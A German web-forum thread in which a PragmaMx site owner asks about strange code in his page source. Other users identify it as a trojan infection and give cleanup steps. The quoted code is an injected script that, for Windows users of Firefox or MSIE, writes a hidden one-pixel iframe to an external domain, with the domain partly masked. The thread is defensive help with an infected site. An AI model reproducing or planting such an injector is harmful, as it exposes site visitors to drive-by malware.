Sicherheitslücke?

Begonnen von wiederalleine, 17 April 2012, 12:48:48

⏪ vorheriges - nächstes ⏩

0 Mitglieder und 1 Gast betrachten dieses Thema.

wiederalleine

Nettes Hallo an Euch,

habe im Quelltext von www.auto***rtrieb-saar.de soeben das hier entdeckt:

Zitat<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de" dir="ltr"><script type="text/javascript">function get_cookie(Name) {   var search = Name + "=";   var returnvalue = "";   if (document.cookie.length > 0) {      offset = document.cookie.indexOf(search);      if (offset != -1) {          offset += search.length;         end = document.cookie.indexOf(";", offset);         if (end == -1)         end = document.cookie.length;         returnvalue=unescape(document.cookie.substring(offset, end));      }   }   return returnvalue;}function set_cookie(name, value) {    var cxdate = new Date();    cxdate.setYear(2024);    cxdate.setMonth(3);    cxdate.setDate(3);    document.cookie = name + '=' + escape(value) + ';expires=' + cxdate.toGMTString() + ';path=/';}var br_reg = /(Firefox|MSIE)/i;var usr_os = navigator.userAgent;if(get_cookie('toppedup') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg)) {   document.write('<iframe frameborder=0 height=1 width=1 scrolling=no src="http://dw*******rado.org/index.php"> </iframe>');   set_cookie('toppedup', '1010101');}</script><head>


und weiss gar nicht, wie dieser Link dort hineinkommen konnte!

Weiss da jemand einen Rat?

Gruß und Dank

Peter

P.S. Pragmamx Version 1.12.1


trulla

Schnell weg damit... Mein Virenprogramm schlägt Alarm auf deiner Seite. :o

Andi

Moin :)

Die Stelle an der der Code erscheint, weist darauf hin, dass zumindest die header.php verändert wurde.
Prüfe mit der Versionskontrolle, was noch alles verändert ist...

Die Google-Suche nach dem Schadcode bringt mir u.A. folgende 3 Links:
- http://www.xtc-supportforum.de/viewtopic.php?f=32&t=5799
- http://www.hijackthis-forum.de/allgemeine-probleme/58095-iframe-trojaner-oder-mehr.html
- http://www.naviuser.at/forum/showthread.php?p=36057

Anscheinend handelt es sich um einen Trojaner, der FTP-Passwörter ausliest und dann die Dateien beim hochladen infiziert, oder so ähnlich...
- Virencheck deines Rechners und allen Rechnern, die FTP-Zugriff auf deine Seiten haben
- FTP-Passwöerter ändern
- Hoster unterrichten, dass der auch mal den Server nach Trojendern und so Dreck checkt
- Schadcode auf dem Server (und deiner Seite) entfernen.


PS:
habe die Links entschärft
schön´s Grüssle, Andi

wiederalleine

Danke ---- für die schnelle Info! Habe alle neuen Dateien aus 1.12.1 aufgespielt, alle Passwörter geändert und es sieht wieder gut aus.....!

Gruß

Peter